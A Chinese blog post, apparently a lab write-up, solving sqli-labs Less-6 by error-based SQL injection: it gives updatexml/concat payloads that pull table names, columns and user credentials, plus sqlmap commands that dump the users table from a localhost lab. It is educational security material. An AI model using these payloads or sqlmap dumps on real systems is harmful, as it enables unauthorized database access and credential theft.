当前位置: 首页 > news >正文

sqli-labs:Less-6关卡详细解析

1. 思路🚀

本关的SQL语句为:

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
  • 注入类型:字符串型(双引号包裹)
  • 提示:参数id需以"闭合

同样无法像常规一样回显,php输出语句的代码如下:

	if($row){echo '<font size="5" color="#FFFF00">';	echo 'You are in...........';echo "<br>";echo "</font>";}

对于很多注入出现无回显的情况,其原因可能是SQL语句查询方式的问题导致,这就需要用到盲注的手段,常用的有:

  • 布尔盲注:逻辑判断
  • 时间盲注:延时判断
  • 报错盲注:报错回显(本关卡解决方法)✅

在这里插入图片描述


2. 手工注入步骤🎯

我的地址栏是:http://localhost:8081/Less-6/,只需要将下面的sql语句粘贴即可。

2.1. 正常请求⚡

?id=1

在这里插入图片描述

说明:测试回显情况


2.2. 判断字段数⚡

?id=1" order by 4 --+
  • order by 4:探测字段数(报错说明字段数=3)

在这里插入图片描述


2.3. 确定回显位⚡

?id=1" and updatexml(1,(select database()),3) --+
  • updatexml 是 MySQL 的一个 XML 处理函数,但它常被用于 报错注入(Error-Based Blind SQL Injection),因为它会在 XPath 解析错误时返回错误信息,从而泄露数据。

在这里插入图片描述

2.4. 获取基础信息

?id=1" and updatexml(1,concat(1,(select database())),3) --+

在这里插入图片描述


2.5. 获取表名⚡

?id=1" and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security')),3) --+

在这里插入图片描述


2.6. 获取字段⚡

?id=1" and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users')),3) --+

在这里插入图片描述


2.7. 获取数据⚡

?id=1" and updatexml(1,concat(1,(select concat(username, ':', password) from users limit 0,1)),3) --+

因为updatexml()函数最多显示32位数据,建议使用concat()搭配limit + offset使用,例如limit n,1,n为起始位置。
在这里插入图片描述


2.8. 参数汇总表⭐

参数作用示例
"闭合符号id=1"
--+注释符--+
order by判断字段数order by 4
updatexml()报错注入函数updatexml(1,(select database()),3)
concat()字符串拼接函数concat('a','b')concat(1,(select database()))
group_concat()合并结果group_concat(table_name)
information_schema系统数据库from information_schema.tables
table_schema数据库名称table_schema='security'
table_name数据表名称table_name='users'
column_name字段名称group_concat(column_name)

3. SQLMap工具测试🎯

url地址换成自己的,后面一定要加上id=1,比如:http://localhost:8081/Less-6/?id=1

# 检测注入点
python sqlmap.py -u "http://localhost:8081/Less-6/?id=1" --batch# 爆数据库
python sqlmap.py -u "url" --dbs --batch# 爆表名
python sqlmap.py -u "url" -D security --tables --batch# 爆列名
python sqlmap.py -u "url" -D security -T users --columns --batch# 爆数据
python sqlmap.py -u "url" -D security -T users -C id,username,password --dump --batch

命令1截图:
在这里插入图片描述

命令5截图:
在这里插入图片描述

SQLMap参数表⭐

参数功能
--batch非交互模式
--dbs枚举数据库
-D指定数据库
-T指定表
-C指定列
--dump导出数据

4. 总结🏁

关卡6和关卡5其解法一致,建议移步到关卡5的解析(该解析较为详细),sqli-labs:Less-5关卡详细解析:
https://blog.csdn.net/qq_62000508/article/details/149778521?spm=1011.2124.3001.6209
如有不懂,关卡1的解析更为详细(更为基础),相信你会有收获,sqli-labs:Less-1关卡详细解析:https://blog.csdn.net/qq_62000508/article/details/149773926?spm=1011.2124.3001.6209


声明:本文仅用于安全学习,严禁非法测试! ❗❗❗

http://www.dtcms.com/a/306223.html

相关文章:

  • nodejs项目中常用的npm包及分类
  • 个人如何做股指期货?
  • 高职工业数据采集与边缘服务应用实训室解决方案
  • npm run dev 启动项目 报Error: listen EACCES: permission denied 0.0.0.0:80 解决方法
  • NPM组件 @0xme5war/apicli 等窃取主机敏感信息
  • vue create 项目名 和 npm init vue@latest 创建vue项目的不同
  • Vue2-封装一个看起来像左右分布表格的表单组件
  • python基础:用户输入和 while 循环
  • 学习日志22 python
  • 2024 年 NOI 最后一题题解
  • 从0到1学PHP(八):PHP 与 MySQL 数据库:数据持久化存储
  • Spring AI 海运管理应用第2部分
  • 关于市场成交量和散户操作错误率的提问和思考。
  • QT笔记(2)——vscode + CMAKE + qtcreate的操作方式
  • 【PostgreSQL内核学习:WindowAgg 帧优化与节点去重】
  • 【Unity3D实例-功能-移动】复杂移动(Blend Tree方式)
  • 169-Django二手交易校园购物系统开发分享
  • django-4事务
  • 游戏盾是如何做到免疫攻击的
  • Android自定义游戏view积累
  • 从混乱走向高效:重塑企业IT服务管理的未来路径
  • 【网络运维】Linux:软件包管理
  • python案例分析:基于抖音评论的文本分析,使用svm算法进行情感分析以及LDA主题分析,准确率接近90%
  • Qt Quick 可视化组件应用
  • 应用药品 GMP 证书识别技术,实现证书信息的自动化、精准化提取与核验
  • OriGene:一种可自进化的虚拟疾病生物学家,实现治疗靶点发现自动化
  • RK3568下的进程间通信:基于UDP的mash网络节点通信
  • Java注解与反射:从自定义注解到框架设计原理
  • 双线串行的 “跨界对话”:I2C 与 MDIO 的异同解析
  • 详细聊下easyexcel导出